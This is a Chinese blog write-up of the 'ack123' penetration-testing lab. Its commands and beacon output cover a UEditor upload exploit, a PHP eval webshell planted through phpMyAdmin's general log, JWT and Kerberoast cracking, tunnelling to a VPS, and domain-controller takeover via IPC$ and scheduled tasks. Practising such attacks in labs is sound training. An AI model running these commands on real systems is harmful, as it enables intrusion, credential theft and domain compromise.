ack123打靶记录

已于 2022-04-25 12:31:22 修改
阅读量4.9k 收藏 4
点赞数 1
分类专栏: 打靶记录 文章标签: web安全
于 2022-03-20 17:42:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45677784/article/details/123615449
版权

前言:

此靶场是月师傅九月出师考核靶场,搭建过程参考文章红队考核靶场ack123下载和搭建

靶场地址:https://pan.baidu.com/s/13g_1FFg-ZYYpBwkCvKyYWQ 提取码:7fkj

靶场拓扑图:

靶场的主要考点:

1.站库分离 外网打点

2.过360全家桶

3.过windwos defender

4.过火绒

5.内网漫游

6.多层网络渗透

7.横向渗透

8.jwt token密钥破解

9.权限提升

10.域渗透

11.phpmyadmin写shell

12.sqlserver 提权

前端模版为hdhcms,通过注册进入后台发现Ueditor编辑器版本1.4.3

访问路径/admin/net/controller.ashx?action=catchimage

制作表单上传文件

demo.html

<form action="http://www.ackmoon.com/admin/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">

       <p>shell addr:<input type="text" name="source[]" />

       </p >  <inputtype="submit" value="Submit" />

</form>

起服务

浏览器访问,填写路径http://192.168.1.9:8000/2.gif?.aspx,之后提交

哥斯拉连接

看下ip,59.130是shell地址,另外还有个22.129段

查看杀软情况

tasklist /svc

权限比较低,看下kb编号,打的还挺多

systeminfo

利用哥斯拉自带的烂土豆提权到system

上线cs

首先用cs建立反连接

frp服务端修改配置文件

https://github.com/fatedier/frp

启动

客户端修改配置文件

启动

cs监听,ip为服务端

免杀shellcode(免杀方式就不贴了,打的时候能过,现在有点悬233

生成payload使用sublime替换下\为以下格式

执行生成exe

上传到c:\windows\temp 下,执行上线成功

看下站点根目录,发现数据库连接密码

C:/Hws.com/HwsHostMaster/wwwroot/www.ackmoon.com/web/HdhApp.config

上传大马连接数据库

存在administrator用户

上传免杀马上线数据库

使用cs插件烂土豆提权到system

扫描下端口22段ip,得到三个存活主机

上传ew做下代理,需要免杀下,不然容易被杀(简单修改资源树就能起到免杀效果啦

vps执行

ew -s rcsocks -l 1080 -e 1024

web1执行

shell c:\ew.exe -s rssocks -d 192.168.1.20 -e 1024

改下socks5代理,请求22.138,登陆进去后台,在本地存储得到一串jwt数据

github下载jwt_tool 破解密钥

git clone https://github.com/ticarpi/jwt_tool.git

cd jwt_tool

python3 -m pip install -r requirements.txt

python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOlwvXC8xMC4xMC4xLjEzNSIsImF1ZCI6Imh0dHA6XC9cLzEwLjEwLjEuMTM1IiwiaWF0IjoxNjQyMTY0MDA2LCJuYmYiOjE2NDIxNjQwMTYsImV4cCI6MTY0MjE2NDYwNiwiZGF0YSI6eyJ1c2VyaWQiOjEsInVzZXJuYW1lIjoiZGVtbyJ9fQ.mgbBNSJL1MTGep8eJTqfvH-1Zf6F82_Lvp19eGlr0DA -C -d /usr/share/wordlists/rockyou.txt
​

使用祖传字典爆破出phpmyadmin4.8.5 后台,使用刚刚破解密码登陆进入后台

http://192.168.22.138/phpmyadmin4.8.5/index.php

root/Qweasdzxc5

文件包含日志getshell

SET GLOBAL general_log='on'   开启日志记录

SHOW VARIABLES LIKE 'general%';       查看日志状态,得到路径

SET GLOBAL general_log_file='C:/phpStudy_pro/WWW/a.php’设定日志保存路径

select '<?php eval($_POST["cmd"]); ?>'
​

连接

配置转发上线监听地址为data1 ip

生成exe,上传执行

上线web2

可以看到当前主机在域控里

shell ipconfig /all

查询spn(可以快速定位运行重要服务的主机

shell setspn -T ack123.com -q */*

找域用户起的服务,注入进程,得到新的shell

创建/伪造票据

mimikatz kerberos::ask /target:mysql/16server-dc1.ack123.com

查询票据

导出hash

换位置

访问文件夹,下载kirbi文件

github脚本爆破(这里建议得到hash之后在线md5尝试解一下,有概率能解开

https://github.com/nidem/kerberoast

python3 tgsrepcrack.py /usr/share/wordlists/rockyou.txt ../1-40a10000-web2@mysql\~16server-dc1.ack123.com-ACK123.COM.kirbi

使用计划任务上线dc

建立IPC$连接(由于没有截图我就直接把输出打印出来了Orz

beacon> shell net use \\10.10.10.135\ipc$ /user:administrator "P@55w0rd!"

[*] Tasked beacon to run: net use \\10.10.10.135\ipc$ /user:administrator "P@55w0rd!"

[+] host called home, sent: 90 bytes

[+] received output:

命令成功完成。


将本地的shellcode复制copy到135机器的c盘下

beacon> shell copy C:\Users\administrator.ACK123\Desktop\a1.exe \\10.10.10.135\c$\a1.exe

[*] Tasked beacon to run: copy C:\Users\administrator.ACK123\Desktop\a1.exe \\10.10.10.135\c$\a1.exe

[+] host called home, sent: 105 bytes

[+] received output:

已复制         1 个文件。

查看下有没有copy成功

beacon> shell dir\\10.10.10.135\c$\

[*] Tasked beacon to run: dir\\10.10.10.135\c$\

[+] host called home, sent: 52 bytes

[+] received output:

 驱动器 \\10.10.10.135\c$ 中的卷没有标签。

 卷的序列号是 FA4C-1AE9


 \\10.10.10.135\c$ 的目录


2022/01/16  17:13           288,256 a1.exe

2022/01/16  18:29           288,256 c5.exe

2016/07/16  21:23    <DIR>          PerfLogs

2021/08/28  01:29    <DIR>          PHP5433

2021/08/21  17:41    <DIR>          Program Files

2016/07/16  21:23    <DIR>          Program Files (x86)

2021/08/21  17:40    <DIR>          Users

2022/01/16  20:19    <DIR>          Windows

               2 个文件        576,512 字节

               6 个目录51,418,132,480 可用字节

创建计划任务

beacon> shell SCHTASKS /Create /S 16server-dc1.ack123.com /U Administrator /P "P@55w0rd!" /SC ONCE /ST 14:32:42 /TN 361 /TR c:\a1.exe /RU Administrator

[*] Tasked beacon to run: SCHTASKS /Create /S 16server-dc1.ack123.com /U Administrator /P "P@55w0rd!" /SC ONCE /ST 14:32:42 /TN 361 /TR c:\a1.exe /RU Administrator

[+] host called home, sent: 168 bytes

[+] received output:

警告: 因为 /ST 早于当前的时间,任务可能无法运行。

成功: 成功创建计划任务"361"。
​

执行计划任务

beacon> shell schtasks /run /s 10.10.10.135 /i /tn 361 /U Administrator /P "P@55w0rd!"

[*] Tasked beacon to run: schtasks /run /s 10.10.10.135 /i /tn 361 /U Administrator /P "P@55w0rd!"

[+] host called home, sent: 103 bytes

[+] received output:

成功: 尝试运行"361"。

上线dc1成功

上线data2

建立smb监听,输入明文密码

成功上线

完结收工

总结:

文章写的比较少,所以看着可能比较乱,部分技术实现一笔带过(主要也没啥好说的233),漏洞利用过程比较常见Orz,有大师傅能分享别的漏洞利用思路,欢迎一起交流啊!!!

1ighttack
关注
专栏目录
【云原生】阿里云Kubernetes(ACK)简介
CN_Eden
01-28 2469
使用阿里云容器服务ACK产品前,需要注意以下使用限制:购买容器服务ACK实例前,需要进行实名认证。只有当您账户余额和代金券总值不小于100元时,才可创建按量付费的阿里云资源。在创建ACK集群以后,暂不支持以下项:变更集群的VPC。变更托管集群为专有集群,以及变更Pro版集群为标准版集群。变更容器网络插件。变更存储插件。在不同命名空间下迁移应用。ACK集群中ECS实例的限制如下:创建的ECS实例目前支持按量付费和包年包月,其他资源(例如负载均衡)为按量付费。
暗月ACK靶场 WP
qq_45414878的博客
01-31 1477
暗月ACK靶场,繁忙之余对内网知识复习巩固
BoredHackerBlog打靶记录(附靶机地址)
weixin_46591320的博客
11-04 805
BoredHackerBlog打靶记录
【网络安全渗透测试零基础入门必知必会】之Windows权限提升实战,零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
08-06 636
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段系统权限提升与防御第2篇。当我们通过弱口令进入到应用后台管理当我们下载备份文件获取到数据库信息当我们通过漏洞拿到资产系统的Web权限当我们在公司被给予账号密码登录计算机或系统当我们在公司或钓鱼后门获取到某个公司机器系统。
【内网安全】——Windows提权姿势
qq_53058639的博客
01-27 1048
令牌(Token):令牌(token)是系统的临时秘钥,相当于账号和密码,用来决定是否允许这次请求和判断这次请求是属于哪一个用户的。它允许你在不提供密码或其他凭证的前提下,访问网络和系统资源,这些令牌将持续存在于系统中,除非系统重新启动。令牌最大的特点就是随机性,不可预测,黑客或软件无法猜测出令牌。令牌分类访问令牌(Access Token): 表示访问控制操作主体的系统对象会话令牌(Session Token): 交互会话中唯一的身份标识符。
【内网渗透】利用非常规手段突破安全策略上线CS
HBohan的博客
10-28 1207
前言 本文为一篇利用非常规手段突破安全策略的内网渗透记录 【查看资料】 环境简述&说明 web打点getshell,webshell是冰蝎,权限为.net,权限很低,服务器为server 2016,目标不出网! 装有杀毒软件(火绒、微软自带的WD),ASMI默认开启,而且对power shell有特殊策略限制。 Tcp、icmp、DNS协议不通,无法直接与公网的cs服务端建立连接,(内网的cs服务端也无法与其建立连接)公网也无法访问目标web服务(纯内网web服务) 极其严格的出入站策略 入
提权 - Windows 烂土豆/ dll劫持 /服务权限
acepanhuan的博客
03-01 1259
提权 - Windows 烂土豆/ dll劫持 /服务权限
哥斯拉Godzilla shell管理工具
weixin_50464560的博客
09-03 3115
各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell, 于是团队的BeiChenDream师傅开发了这款“哥斯拉“  本文出自ChaBug Y4er师傅   简单使用方法 在哥斯拉安装之前,你需要安装jdk1....
ack2:** ack 2不再被维护。 ack 3是最新版本。**
02-05
ack是一种代码搜索工具,类似于grep,但已为程序员搜索大型源代码树进行了优化。 它在纯Perl中运行,具有高度的可移植性,并且可以在运行Perl的任何平台上运行。 ack由Andy Lester( )编写和维护。 项目主页: ...
ack.rar_ACK_黑防
09-20
黑防出的源码修改过.效果更好些.肉鸡很少掉!
storm利用ack保证数据的可靠性源码
10-10
- **重试**:如果在某个点上tuple处理失败,Storm会记录这个失败,并在超时后重试未确认的tuple。 3. **可靠性的实现** - **时间窗口**:Storm使用了一个超时窗口,如果在设定的时间内没有接收到ack,那么会认为...
HDHCMS建站系统 v1.5 bulid20191011
10-22
HDHCMS是目前国内ASP.NET少见的优秀建站管理系统,基于 ASP.NET(C#)+ MSSQL的技术开发,同步支持PC与手机网站的建设,后台支持微信公众号的接入。安装布置流程:1、下载HDHCMS.RAR的压缩包后解压,里面有个database目录,附加到SQL2008 R2的数据库可以做为案例学习;2、如果不用自带的案例,可以在服务器上新建空的数据库并设置好用户名与访问密码即可。3、找到网站目录的目录下的“hdhapp.config”文件,打开后如果是连“ACCESS”数据库的网点,请把“HdhCmsDataType”的值改成2,如果是连“MSSQL”数据库的网站,请把“HdhCmsDataType”的值改成1。对应的“HdhCmsAccessName”保存ACCESS数据库文件的当前路径及文件名;“HdhCmsConnStr”保存的是MSSQL数据库的当前路径及文件名。4、通过FTP工具将解压后的所有文件上传到你网站的空间下即可;5、后台登录地址:http://你的网址/admin/,默认管理员帐号:admin,密码:123456 6、新增插件管理7、新增全新的综合网站模板
tcp_ack_check.rar_opnet tcp_tcp协议ack机制在opnet中实现
09-24
在TCP中,ACK(Acknowledgment)机制是确保数据可靠传输的重要部分。当一个TCP段被发送后,接收端会通过发送ACK来确认接收到的数据。这个过程被称为TCP的确认机制,它确保了数据的正确传输,避免了数据丢失或重复。 ...
Hadoop生态漏洞修复记录
manweizhizhuxia的博客
03-28 3153
Hadoop、zookeeper、hive漏洞修复
哥斯拉木马解析 + bypass 免杀代码分析+回调webshell
m0_64180167的博客
12-28 2714
这里也是跟着大佬走的这里首先我是去看了看bypass 学习一下然后我们就可以发现对比我这里将混淆什么的都去掉下面是原版的哥斯拉能发现 确实通过特殊的编码和对字符串的处理,实现bypass落地的时候确实火绒扫不出来我们将两种放到 阿里云中查看一下可以发现已经被识别到了(肯定是被抓特征了)这里我们首先就开始分析一下哥斯拉的php木马类别是 php xor base64这里是基本的代码查看 这里有些是我自己加上去进行判断的这里给出一下大致流程顺便给出session的解释。
实战分析某红队魔改哥斯拉Webshell
include_voidmain的博客
05-31 9973
声明 以下内容,来自先知社区的ga0weI作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。 0x01 前言 前两天从某次演习中拿到了一个webshell样本,该webshell通信未产生相关任何告警,因此该样本在免杀以及bypass相关waf和ids设备上是非常值得学习的。 分析过程中不难发现其实这个就是一个魔改的Godzilla,其魔改的思路比较出奇,并且其免杀做的很到位。 为什么说这个webshell是魔改的哥斯
五大后门连接工具&木马免杀初级思路
weixin_54882883的博客
08-25 1254
在我们上传木马的时候,经常会遇到木马查杀,木马上传上去了突然被杀了删除了,有时候木马上传了,但是连不上去,这是在getshell中经常遇到的问题,那么当遇到这种问题,就需要让木马绕过网站上WAF的一些查杀等等问题了。那么这个时候POST还需将我们要执行的代码命令等等进去传送给assert函数。但是eval不能直接在URL中添加所以用assert来代替。其实assert和eval的功能上是差不多。检测机制检测就是未知代码不知道。为什么e=assert呢。那么这个地址就是后门地址。加密其实就是把木马加密了。..
容器内反弹shell的51种姿势
帮助别人等于帮助自己 ——MXi4oyu
11-19 1413
什么是反弹shell? 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向
vulnhub 网站靶机 DC-1 打靶记录
weixin_43959885的博客
10-31 3015
vulnhub 网站靶机 DC-1 打靶记录 确定IP地址 首先从在虚拟机里面可以得知是实用的桥接模式还是NAT模式,可以确定大致网段 下面进行主机扫描 使用nmap ➜ ~ nmap 192.168.18.0/24 -sn Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-19 16:57 CST Nmap scan report for bogon (192.168.18.1) Host is up (0.00044s latency). Nmap
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值